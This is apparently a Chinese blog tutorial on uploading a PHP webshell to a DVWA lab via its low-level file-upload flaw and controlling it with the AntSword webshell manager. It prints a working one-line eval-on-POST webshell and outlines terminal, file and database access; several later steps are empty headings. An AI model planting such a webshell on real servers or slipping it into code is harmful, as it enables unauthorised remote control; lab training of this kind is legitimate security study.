中国蚁剑使用

使用phpstudy搭建的dvwa靶场,测试文件上传漏洞 low级别。

1、准备php木马文件,命名为up.php

<?php
eval($_POST['abc']);
?>

2、phpstudy启动,dvwa登录,置为low级别

3、上传up.php

4、浏览器访问上传的php文件,未报404,说明访问成功

5、启动中国蚁剑exe,在主面板右键菜单栏选择添加数据。弹窗中配置连接信息

6、配置

其他设置

7、测试和添加

8、利用

虚拟终端:ret是子程序的返回指令执行本指令

文件管理:

数据操作:

 

posted @   挖洞404  阅读(842)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
点击右上角即可分享
微信分享提示